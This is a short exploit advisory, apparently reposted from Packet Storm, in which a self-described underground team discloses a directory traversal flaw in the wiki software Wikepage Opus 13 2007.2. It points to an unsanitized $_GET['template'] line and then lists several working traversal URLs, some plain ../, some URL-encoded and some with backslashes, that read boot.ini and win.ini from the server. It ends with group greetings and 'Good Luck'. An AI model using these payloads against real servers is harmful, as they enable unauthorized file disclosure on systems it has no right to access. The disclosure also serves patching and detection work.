Wikepage Opus 13 2007.2 suffers from a directory traversal vulnerability.
d86e2dba79c972175a420359233dfe9760915f6e234612f5a44fd0c2cce2f1f4 ##############################################################################
# #
# ...:::::Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility ::::.... #
##############################################################################
## AUTHOR : Virangar Security Team (A.Nosrati )
## Email : Virangar_nml@yahoo.com or 9120000000@yahoo.com or Virangar_SECRET@hotmail.com
##ICQ: 445117030
## Script : Wikepage Opus 13 2007.2
## Type Of Bug : Directory Traversa
Virangar Security Team
VIRANGAR UNDER GR0UND TEAM
Special tnx to:HadiHadi,black.shadowes,MR.hesy,IGI,Night_Fox,Kasra515,Gholonbeh_MS
& all Virangar Members .........................
Greetz:Ali007;Kouros_Virus2005 ........
-----------------------------------
Web Site : http://www.wikepage.org/
(Download http://sourceforge.net/project/downloading.php?groupname=wikepage&filename=wikepage2007_2.zip&use_mirror=puzzle)
-----------------------------------
vulnerability Path :
vuln code in [localhost]/wikepage/index.php
Sample Of vulnerabil Line : $ templatefile=$_GET['template']; (Line 586) And More .....
Exploit :
http://localhost/wikepage/index.php?wiki=template=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Admin=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=../../../../../../../../boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c# %2e%2e%5c/boot.ini
or
http://localhost/wikepage/index.php?wiki=Recent_changes=..\..\..\..\..\..\..\..\WINDOWS\win.ini
and more ........
Good Luck
Virangar.org ( Coming Soooooooooooooooooooooon::::::::::::::::::)
Are U Ready hummmmmmmmmmmm???!!!!!!!!!!
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed